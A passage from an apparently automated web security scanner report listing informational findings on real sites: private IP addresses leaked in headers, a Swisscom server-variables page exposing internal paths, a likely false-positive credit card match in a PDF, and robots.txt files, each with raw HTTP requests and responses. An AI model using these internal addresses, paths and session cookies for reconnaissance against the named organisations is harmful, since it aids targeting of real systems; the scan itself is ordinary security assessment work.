Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-glbfbjch=297A6E0D2EEC0E566AD0298A06CE1FEE

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: User-Agent
Cache-Control: public, must-revalidate, proxy-revalidate
Content-Type: image/jpeg
Expires: Fri, 20 Apr 2012 18:46:14 GMT
Pragma: public
Last-Modified: Thu, 10 Feb 2011 17:51:52 GMT
Content-Length: 1296
Date: Mon, 25 Apr 2011 01:07:07 GMT
X-Varnish: 1412459857 1394179337
Age: 282053
Connection: keep-alive
Via: 1.1 varnish 172.17.35.70
X-Cache: HIT

......JFIF.....H.H.....C....................................................................C.......................................................................J...................................
...[SNIP]...

27.38. http://www.infusionblog.com/wp-content/uploads/2011/04/Infusionsoft-Customer-Tour.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionblog.com
Path:   /wp-content/uploads/2011/04/Infusionsoft-Customer-Tour.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wp-content/uploads/2011/04/Infusionsoft-Customer-Tour.jpg HTTP/1.1
Host: www.infusionblog.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-glbfbjch=297A6E0D2EEC0E566AD0298A06CE1FEE

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: User-Agent
Cache-Control: public, must-revalidate, proxy-revalidate
Content-Type: image/jpeg
Expires: Sat, 21 Apr 2012 11:42:54 GMT
Pragma: public
Last-Modified: Tue, 19 Apr 2011 22:41:23 GMT
Content-Length: 30563
Date: Mon, 25 Apr 2011 01:07:07 GMT
X-Varnish: 1412459873 1398567825
Age: 221053
Connection: keep-alive
Via: 1.1 varnish 172.17.35.70
X-Cache: HIT

......JFIF.....d.d.....C....................................................................C...........................................................................................................
...[SNIP]...

27.39. http://www.infusionblog.com/wp-content/uploads/2011/04/Perfect-Customer-Lifecycle-thumb.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionblog.com
Path:   /wp-content/uploads/2011/04/Perfect-Customer-Lifecycle-thumb.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wp-content/uploads/2011/04/Perfect-Customer-Lifecycle-thumb.jpg HTTP/1.1
Host: www.infusionblog.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-glbfbjch=297A6E0D2EEC0E566AD0298A06CE1FEE

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: User-Agent
Cache-Control: public, must-revalidate, proxy-revalidate
Content-Type: image/jpeg
Expires: Sat, 21 Apr 2012 11:42:55 GMT
Pragma: public
Last-Modified: Fri, 01 Apr 2011 21:12:56 GMT
Content-Length: 6792
Date: Mon, 25 Apr 2011 01:07:08 GMT
X-Varnish: 1412459984 1398567841
Age: 221054
Connection: keep-alive
Via: 1.1 varnish 172.17.35.70
X-Cache: HIT

......JFIF.....H.H.....C...............
..
       
...............'!..%..."."%()+,+. /3/*2'*+*...C....
   
....*...**************************************************..........................................
...[SNIP]...

27.40. http://www.infusionblog.com/wp-content/uploads/2011/04/fb-silhouette.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionblog.com
Path:   /wp-content/uploads/2011/04/fb-silhouette.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wp-content/uploads/2011/04/fb-silhouette.jpg HTTP/1.1
Host: www.infusionblog.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-glbfbjch=297A6E0D2EEC0E566AD0298A06CE1FEE

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: User-Agent
Cache-Control: public, must-revalidate, proxy-revalidate
Content-Type: image/jpeg
Expires: Sat, 21 Apr 2012 11:42:54 GMT
Pragma: public
Last-Modified: Thu, 14 Apr 2011 21:22:55 GMT
Content-Length: 3726
Date: Mon, 25 Apr 2011 01:07:07 GMT
X-Varnish: 1412459870 1398567830
Age: 221053
Connection: keep-alive
Via: 1.1 varnish 172.17.35.70
X-Cache: HIT

......JFIF.....`.`.....C...........................    .

   .        
...
...        .......
.............C.............    .............................................................................................
...[SNIP]...

27.41. http://www.infusionblog.com/wp-content/uploads/2011/04/playground.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionblog.com
Path:   /wp-content/uploads/2011/04/playground.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wp-content/uploads/2011/04/playground.jpg HTTP/1.1
Host: www.infusionblog.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-glbfbjch=297A6E0D2EEC0E566AD0298A06CE1FEE

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: User-Agent
Cache-Control: public, must-revalidate, proxy-revalidate
Content-Type: image/jpeg
Expires: Sat, 21 Apr 2012 11:42:54 GMT
Pragma: public
Last-Modified: Mon, 18 Apr 2011 20:59:21 GMT
Content-Length: 17374
Date: Mon, 25 Apr 2011 01:07:07 GMT
X-Varnish: 1412459869 1398567828
Age: 221053
Connection: keep-alive
Via: 1.1 varnish 172.17.35.70
X-Cache: HIT

......JFIF.....:.:.....C......................
.....
...
.................................C.......    ..    ..............................................................................................
...[SNIP]...

27.42. http://www.infusionblog.com/wp-content/uploads/2011/04/smileys.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionblog.com
Path:   /wp-content/uploads/2011/04/smileys.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wp-content/uploads/2011/04/smileys.jpg HTTP/1.1
Host: www.infusionblog.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-glbfbjch=297A6E0D2EEC0E566AD0298A06CE1FEE

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: User-Agent
Cache-Control: public, must-revalidate, proxy-revalidate
Content-Type: image/jpeg
Expires: Sat, 21 Apr 2012 11:42:55 GMT
Pragma: public
Last-Modified: Mon, 11 Apr 2011 23:33:47 GMT
Content-Length: 21112
Date: Mon, 25 Apr 2011 01:07:08 GMT
X-Varnish: 1412459954 1398567840
Age: 221054
Connection: keep-alive
Via: 1.1 varnish 172.17.35.70
X-Cache: HIT

......JFIF.....H.H.....C................    .........    .....................................C.......
..
................................................................................................
...[SNIP]...

27.43. http://www.infusionblog.com/wp-content/uploads/2011/04/support-chat-online.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionblog.com
Path:   /wp-content/uploads/2011/04/support-chat-online.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wp-content/uploads/2011/04/support-chat-online.png HTTP/1.1
Host: www.infusionblog.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-glbfbjch=297A6E0D2EEC0E566AD0298A06CE1FEE

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: User-Agent
Cache-Control: public, must-revalidate, proxy-revalidate
Content-Type: image/png
Expires: Sat, 21 Apr 2012 11:42:54 GMT
Pragma: public
Last-Modified: Wed, 20 Apr 2011 17:37:54 GMT
Content-Length: 3909
Date: Mon, 25 Apr 2011 01:07:07 GMT
X-Varnish: 1412459868 1398567826
Age: 221053
Connection: keep-alive
Via: 1.1 varnish 172.17.35.70
X-Cache: HIT

.PNG
.
...IHDR.....................IDATx...ypU...#...U...#.3"*j....:.-b.Qke.:S.L.    .&.M$.*K 8....f(...F..    I..!..$..v$.......o.d.9.9w...yf.....|k..Y.{.M.8......(w.A.i..A.i.N.4A.i...4......8:h.XV(.D..
...[SNIP]...

27.44. http://www.swisscom.ch/Swisscom.CorporatePortal.Web.RES/Pages/ServerVariables.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.swisscom.ch
Path:   /Swisscom.CorporatePortal.Web.RES/Pages/ServerVariables.aspx

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /Swisscom.CorporatePortal.Web.RES/Pages/ServerVariables.aspx HTTP/1.1
Host: www.swisscom.ch
Proxy-Connection: keep-alive
Referer: http://www.swisscom.ch/res/hilfe/kontakt/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.167121303670987960; s_vnum=1306263001740%26vn%3D1; s_vi=[CS]v1|26DA3866851D25B3-6000012740522469[CE]; s_cc=true; CTQ=second; s_nr=1303671082855-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=level0%3Anone; s_visit=1; B=level0; s_sq=swisscom-onelive%3D%2526pid%253Dlevel0/en/privatkunden/63%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx%25253Fcat%25253DOS_Festnetz%252526sub%2526ot%253DA; ASP.NET_SessionId=1hn0oa55wh0xxciu4mjibnvz; languageId=en

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:52:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2169
X-Cache: MISS from www.swisscom.ch

var APPL_MD_PATH = "/LM/W3SVC/322437409/Root/Swisscom.CorporatePortal.Web.RES";
var AUTH_TYPE = "";
var AUTH_USER = "";
var AUTH_PASSWORD = "";
var LOGON_USER = "";
var REMOTE_USER = "";

...[SNIP]...

var HTTPS_SECRETKEYSIZE = "";
var HTTPS_SERVER_ISSUER = "";
var HTTPS_SERVER_SUBJECT = "";
var INSTANCE_ID = "322437409";
var INSTANCE_META_PATH = "/LM/W3SVC/322437409";
var LOCAL_ADDR = "10.77.129.97";
var PATH_INFO = "/Swisscom.CorporatePortal.Web.RES/Pages/ServerVariables.aspx";
var PATH_TRANSLATED = "D:\FXCMS\CorporatePortal\Swisscom.CorporatePortal.Web.RES\Pages\ServerVariables.aspx";
var QUERY_STRING = "";
var REMOTE_ADDR = "10.187.66.10";
var REMOTE_HOST = "10.187.66.10";
var REMOTE_PORT = "59754";
var REQUEST_METHOD = "GET";
var SCRIPT_NAME = "/Swisscom.CorporatePortal.Web.RES/Pages/ServerVariables.aspx";
var SERVER_NAME = "www1.swisscom-fixnet.ch";
var SE
...[SNIP]...

28. Credit card numbers disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pcisecuritystandards.org
Path:   /documents/pci_dss_v2.pdf

Issue detail

The following credit card numbers were disclosed in the response:

Request

GET /documents/pci_dss_v2.pdf HTTP/1.1
Host: www.pcisecuritystandards.org
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:27:52 GMT
Server: Apache
Last-Modified: Fri, 05 Nov 2010 15:25:10 GMT
ETag: "313836-1de1de-4944fe14ba180"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/pdf
Content-Length: 1958366

%PDF-1.4
%....
5 0 obj
<</Length 6 0 R/Filter /FlateDecode>>
stream
x..UMo$5.........W.\...".B.#....Iv...(.p.........H.L..W...c.].....j....7.}z..cw..b\>.C..~...>...G..C..G@..@....:..\...}......_.W.
...[SNIP]...
</BaseFont/ZHISPP+Helvetica-Oblique/FontDescriptor 21 0 R/Type/Font
/FirstChar 32/LastChar 151/Widths[
278 0 0 0 0 0 0 191 333 333 0 0 278 333 278 278
556 556 556 556 556 556 556 556 556 556 278 0 0 0 0 556
0 667 667 722 722 667 611 778 722 278 500 0 556 833 722 778
667 778 722 667 611 722 667 944 667 667 611 0 0 0 0 0
0 556 556 500 556 556 278 556 556 222 222 500 222 833 556 556
556 556 333 50
...[SNIP]...
56 556 333 0 0 0 0 0
0 722 722 722 722 667 611 0 0 278 0 0 0 833 722 778
667 0 722 667 611 722 0 944 0 0 0 0 0 0 0 0
0 556 611 556 611 556 333 611 611 278 0 556 278 889 611 611
611 611 389 556 333 611 556 778 556 556 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 556]
/Encoding/WinAnsiEncoding/Subtype/Type1>
...[SNIP]...
33 0 0 0 0 0
0 722 722 722 722 667 611 0 722 278 0 0 0 833 722 778
667 778 722 667 611 722 667 944 0 0 0 0 0 0 0 0
0 556 611 556 611 556 333 611 611 278 278 556 278 889 611 611
611 611 389 556 333 611 556 778 556 556 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 556]
/Encoding/WinAnsiEncoding/Subtype/Type1>
...[SNIP]...

29. Robots.txt file  previous  next
There are 142 instances of this issue:


29.1. http://0.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://0.gravatar.com
Path:   /avatar/ad516503a11cd5ca435acc9bb6523536

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 0.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: text/plain
Date: Sun, 24 Apr 2011 17:07:03 GMT
Expires: Sun, 24 Apr 2011 17:12:03 GMT
Last-Modified: Tue, 18 Jan 2011 12:04:24 GMT
Server: ECS (dca/5339)
X-Cache: HIT
Content-Length: 99
Connection: close

User-Agent: *
Disallow: /*.json
Disallow: /*.xml
Disallow: /*.php
Disallow: /*.vcf
Disallow: /*.qr

29.2. http://2byto.com/bluepixel/cnt-gif1x1.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://2byto.com
Path:   /bluepixel/cnt-gif1x1.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 2byto.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:40:41 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9
Last-Modified: Sun, 19 Dec 2010 18:40:53 GMT
ETag: "10000000fc564-1b-497c7be430994"
Accept-Ranges: bytes
Content-Length: 27
Content-Type: text/plain
Connection: close

User-agent: *
Allow: /


29.3. http://a.tribalfusion.com/i.cid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /i.cid

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/plain
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

29.4. http://ad-emea.doubleclick.net/adi/N5295.150290.INVITEMEDIA.COM/B5186974.4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5295.150290.INVITEMEDIA.COM/B5186974.4

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad-emea.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 16:31:04 GMT
Date: Sun, 24 Apr 2011 15:20:08 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

29.5. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:29:27 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 19 Mar 2009 21:31:08 GMT
ETag: "b044005-1a-4657f84ac9f00"
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=172800
Expires: Tue, 26 Apr 2011 12:29:27 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

29.6. http://ad.doubleclick.net/ad/N5047.adwords.google.com/B4529920.12  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N5047.adwords.google.com/B4529920.12

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Sun, 24 Apr 2011 04:08:23 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

29.7. http://adfarm1.adition.com/track  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adfarm1.adition.com
Path:   /track

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adfarm1.adition.com

Response

HTTP/1.1 200 OK
Server: ADITIONSERVER 1.0
Date: Sun, 24 Apr 2011 20:49:50 +0200
Connection: close
Content-Type: text/plain
Content-Length: 28

User-agent: *
Disallow: /

29.8. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Tue, 26 Oct 2010 14:01:22 GMT
Accept-Ranges: bytes
ETag: "43bb7d451675cb1:1315"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Sun, 24 Apr 2011 16:46:39 GMT
Connection: close

User-agent: *
Disallow: /

29.9. http://adsfac.us/ag.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adsfac.us
Path:   /ag.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adsfac.us

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 30 Sep 2008 00:31:21 GMT
Accept-Ranges: bytes
ETag: "e5e89cdc9322c91:0"
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Sun, 24 Apr 2011 19:49:22 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

29.10. http://affiliate.idgtracker.com/rd/r.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://affiliate.idgtracker.com
Path:   /rd/r.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: affiliate.idgtracker.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:19:20 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 28 Dec 2007 17:23:49 GMT
ETag: "1f68231-1d-4425bf522d340"
Accept-Ranges: bytes
Content-Length: 29
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /rd/

29.11. http://ajax.googleapis.com/ajax/services/feed/load  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /ajax/services/feed/load

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=UTF-8
Last-Modified: Mon, 23 Aug 2010 20:43:16 GMT
Date: Sun, 24 Apr 2011 12:35:41 GMT
Expires: Sun, 24 Apr 2011 12:35:41 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

29.12. http://altfarm.mediaplex.com/ad/fm/3992-125865-29115-1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/fm/3992-125865-29115-1

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1289502470000"
Last-Modified: Thu, 11 Nov 2010 19:07:50 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sun, 24 Apr 2011 15:20:49 GMT
Connection: keep-alive

User-agent: *
Disallow: /

29.13. http://analytic.hotelclub.com/b/ss/flairviewhcprod/1/H.17/s84063693960197  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://analytic.hotelclub.com
Path:   /b/ss/flairviewhcprod/1/H.17/s84063693960197

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: analytic.hotelclub.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:09:52 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "190177-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www638
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

29.14. http://api.ak.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.ak.facebook.com
Path:   /restserver.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.ak.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/plain; charset=utf-8
X-FB-Server: 10.28.5.130
X-Cnection: close
Content-Length: 24
Cache-Control: max-age=86400
Expires: Tue, 26 Apr 2011 00:48:18 GMT
Date: Mon, 25 Apr 2011 00:48:18 GMT
Connection: close

User-agent: *
Disallow:

29.15. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: text/plain; charset=utf-8
Expires: Wed, 25 May 2011 01:40:11 GMT
X-FB-Server: 10.36.10.113
Connection: close
Content-Length: 24

User-agent: *
Disallow:

29.16. http://apnxscm.ac3.msn.com:81/CACMSH.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apnxscm.ac3.msn.com:81
Path:   /CACMSH.ashx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: apnxscm.ac3.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/plain
Expires: Mon, 25 Apr 2011 12:30:30 GMT
Last-Modified: Sat, 02 Apr 2011 00:47:24 GMT
Accept-Ranges: bytes
ETag: "1CBF0CF87F3F600"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 24 Apr 2011 12:30:29 GMT
Connection: close
Content-Length: 70

# Keep all robots out of entire web site
User-agent: *
Disallow: /

29.17. http://at.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /ads/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: at.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:16:40 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 19 Mar 2009 21:31:08 GMT
ETag: "b044005-1a-4657f84ac9f00"
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=172800
Expires: Tue, 26 Apr 2011 03:16:40 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

29.18. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Mon, 25 Apr 2011 12:29:52 GMT
Date: Sun, 24 Apr 2011 12:29:52 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

29.19. http://b.voicefive.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Mon, 25 Apr 2011 12:09:49 GMT
Date: Sun, 24 Apr 2011 12:09:49 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

29.20. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658438@x90  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658438@x90

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b3.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:23:25 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 17 Jun 2010 13:38:19 GMT
ETag: "1630213-1a-48939f38ba8c0"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660;path=/;httponly

User-agent: *
Disallow: /

29.21. http://beacon.afy11.net/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beacon.afy11.net
Path:   /ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: beacon.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 06 Jul 2007 06:09:38 GMT
Accept-Ranges: bytes
ETag: "78f7133c94bfc71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 19:54:33 GMT
Connection: close
Content-Length: 30

User-agent: *
Disallow: /


29.22. http://by.optimost.com/trial/112/p/homepage.9c7/7/content.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://by.optimost.com
Path:   /trial/112/p/homepage.9c7/7/content.js

Issue detail

The web server contains a robots.txt file.

Request

